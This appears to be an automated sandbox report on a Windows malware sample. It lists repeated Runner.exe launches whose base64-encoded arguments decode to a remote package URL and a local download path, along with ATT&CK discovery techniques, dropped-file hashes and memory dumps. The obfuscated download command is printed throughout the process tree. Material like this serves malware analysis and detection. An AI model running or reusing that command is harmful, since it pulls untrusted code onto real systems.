- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2516
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:3060
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2812
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2672
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2820
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2120
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2056
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2284
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1264
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1924
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:604
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1920
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1320
- - C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe
    "C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADgAMQBCAEEAOAAwADAAMQAtAEYANQA4ADQALQA3AEEANABDAC0AOAA3AEEANwAtADcAMwAwADEANgAxADAARAA0ADgAMgAzAFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Modules\cdp.dll

Filesize
91KB

MD5
2f369f9928242f730d3cf48678158111

SHA1
f31361fb3ed6f6654ad921cdc59786df4c10885a

SHA256
a056ad6496931b0c0a9405cf4f7a34db68c3b78b30d4907f9472994b836ea022

SHA512
c22c479183f66b65e1cf5b7ed75e30f18db5fd7f6427c04385990d181c53216df33994f296ed235357cc0f22e4d437e97983f910ec67fc7e52fe48fafbbebabe

Download Submit
C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Modules\nvs.dll

Filesize
90KB

MD5
ce70e808b2bcdf50f9fec5a965503af8

SHA1
d8168523669f119d3e603f9569078e36362680f4

SHA256
3a35ed22fe448967d3bbb5ac16710f755760f2a083f05b22884abe811d688039

SHA512
2449dc3716362a1a572fbf7f9472ec0d975dca07cd6d4a7cf50c72c62f9ace9a6d9f7f7f3702dcf32a8bbe81b3f38c3248ac98709d3b4f26d329a6f0f7fb770c

Download Submit
C:\Users\Admin\AppData\Local\81BA8001-F584-7A4C-87A7-7301610D4823\Update\ExtPkg0

Filesize
122B

MD5
63bfc22e886a88b4a7ad8bb9f6ae7cb4

SHA1
fb11f297b81cd271d92a7d9636b2359691709709

SHA256
782ac03b708653aec3db845a028fcb89f68ebfc3242bf6402116d9749ad86a0d

SHA512
47d73ca7e0d36a00e00f7d311abe57b38803d5f30522d75d7a369fdf802c2f893aaa47d3795e8681d91d0b6b914725f709681de4ac810acd1a1923a36e9da6d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\A84EADD5-0AB3-E842-B4AF-523FE9E04265\MSVCP110.dll

Filesize
522KB

MD5
3e29914113ec4b968ba5eb1f6d194a0a

SHA1
557b67e372e85eb39989cb53cffd3ef1adabb9fe

SHA256
c8d5572ca8d7624871188f0acabc3ae60d4c5a4f6782d952b9038de3bc28b39a

SHA512
75078c9eaa5a7ae39408e5db1ce7dbce5a3180d1c644bcb5e481b0810b07cb7d001d68d1b4f462cd5355e98951716f041ef570fcc866d289a68ea19b3f500c43

Download Submit
C:\Users\Admin\AppData\Local\Temp\A84EADD5-0AB3-E842-B4AF-523FE9E04265\MSVCR110.dll

Filesize
854KB

MD5
4ba25d2cbe1587a841dcfb8c8c4a6ea6

SHA1
52693d4b5e0b55a929099b680348c3932f2c3c62

SHA256
b30160e759115e24425b9bcdf606ef6ebce4657487525ede7f1ac40b90ff7e49

SHA512
82e86ec67a5c6cddf2230872f66560f4b0c3e4c1bb672507bbb8446a8d6f62512cbd0475fe23b619db3a67bb870f4f742761cf1f87d50db7f14076f54006f6c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\A84EADD5-0AB3-E842-B4AF-523FE9E04265\Modules\clc.dll

Filesize
111KB

MD5
68ec32cf0860c9db2f668964a928c913

SHA1
3949cd9177b93bc4ad76fdaf8bc2eb2252802972

SHA256
f1107b54b4cbbfbd7a894226317918f5aadafd56c65ea255c81facdc539b88be

SHA512
267bf7498638c7a062e617b44b0eed61df441ea3ea4efb7cded47c062d903d084594797be5a9ccc783a5fd50f84799a2f33afda03cfff731b0e7c215b649f18e

Download Submit
C:\Users\Admin\AppData\Local\Temp\A84EADD5-0AB3-E842-B4AF-523FE9E04265\Modules\wis.dll

Filesize
42KB

MD5
875b93e5075b75fba8b080c578e9170c

SHA1
3e04baed759bafcf80a3edc7f16054739ceb1972

SHA256
3a942e2bfd313ecdbd48ebe05653b50d904f9b1dc30c86067446885a8d01dff7

SHA512
54c008a278de9fe898cc661393df22b62be9dddd31ab910e311a52ab7035b93949baeba7ff4fc40371061bdc6d9ac9ebc6dc5cd6e31050b44964e172162f6b89

Download Submit
\Users\Admin\AppData\Local\Temp\A84EADD5-0AB3-E842-B4AF-523FE9E04265\Modules\crm.dll

Filesize
104KB

MD5
d925422843f1e14f6504456764219367

SHA1
493c1992685c7413a9497aab830175ba92b1f80e

SHA256
ec27c6987d403bb31df794b47060fe707bca85c058ecb62b8a6ec9ab35de2c06

SHA512
9a510d68428c05f63cad243ba43a954fd595f57e2e88dddd0bf79094d19fb80ef9a71803cf635160bc88f4632176c330dadfef04681cff24fdba67732d1f9a06

Download Submit
\Users\Admin\AppData\Local\Temp\A84EADD5-0AB3-E842-B4AF-523FE9E04265\RtHelp.exe

Filesize
334KB

MD5
cdda1f88ec6c73e0f71a4549121165f9

SHA1
b4736704971dd67d904d3664772c815888d60d03

SHA256
0946e5e56039b750820fad2169e66ffe31a5a0d93fc17734948c40f9ef147c43

SHA512
e72c718fe4f0786d171ebc2daf1402667cf380e88877b5675ac782ec22e1b643a4b19b39e193c9002674f2ced61d22de0a7a4f8db9a621fe61534be28fc28775

Download Submit
\Users\Admin\AppData\Local\Temp\nso17A7.tmp\System.dll

Filesize
11KB

MD5
3e6bf00b3ac976122f982ae2aadb1c51

SHA1
caab188f7fdc84d3fdcb2922edeeb5ed576bd31d

SHA256
4ff9b2678d698677c5d9732678f9cf53f17290e09d053691aac4cc6e6f595cbe

SHA512
1286f05e6a7e6b691f6e479638e7179897598e171b52eb3a3dc0e830415251069d29416b6d1ffc6d7dce8da5625e1479be06db9b7179e7776659c5c1ad6aa706

Download Submit
\Users\Admin\AppData\Local\Temp\nso17A7.tmp\UpdHelper.dll

Filesize
130KB

MD5
bb40f596eab5c6598d320677b1731d62

SHA1
2c3f547355e07ba6585d955237a35e1125173028

SHA256
8b972cd7532648027a533330481a6fed08f70718b31396ddf6579519e862b169

SHA512
a2b6757d82bc9ad02516ab83b31c81c310cefc04ffe8ba1937febe44da2e9786a093fba21f6ed412403acde404a6684f7c2ad7f7696c03379fde9d3aee19b436

Download Submit
\Users\Admin\AppData\Local\Temp\nso17A7.tmp\md5dll.dll

Filesize
6KB

MD5
7059f133ea2316b9e7e39094a52a8c34

SHA1
ee9f1487c8152d8c42fecf2efb8ed1db68395802

SHA256
32c3d36f38e7e8a8bafd4a53663203ef24a10431bda16af9e353c7d5d108610f

SHA512
9115986754a74d3084dd18018e757d3b281a2c2fde48c73b71dba882e13bd9b2ded0e6e7f45dc5b019e6d53d086090ccb06e18e6efeec091f655a128510cbe51

Download Submit
memory/2644-66-0x0000000002870000-0x000000000287A000-memory.dmp

Filesize
40KB

Download
memory/2644-56-0x0000000002870000-0x000000000287A000-memory.dmp

Filesize
40KB

Download
memory/2644-52-0x0000000002870000-0x000000000287A000-memory.dmp

Filesize
40KB

Download
memory/2644-50-0x0000000002870000-0x000000000287A000-memory.dmp

Filesize
40KB

Download
memory/2644-77-0x0000000002870000-0x000000000287A000-memory.dmp

Filesize
40KB

Download
memory/2644-84-0x0000000002870000-0x000000000287A000-memory.dmp

Filesize
40KB

Download
memory/2644-59-0x0000000002870000-0x000000000287A000-memory.dmp

Filesize
40KB

Download
memory/2644-63-0x0000000002870000-0x000000000287A000-memory.dmp

Filesize
40KB

Download
memory/2644-69-0x0000000002870000-0x000000000287A000-memory.dmp

Filesize
40KB

Download
memory/2644-36-0x0000000002870000-0x000000000287A000-memory.dmp

Filesize
40KB

Download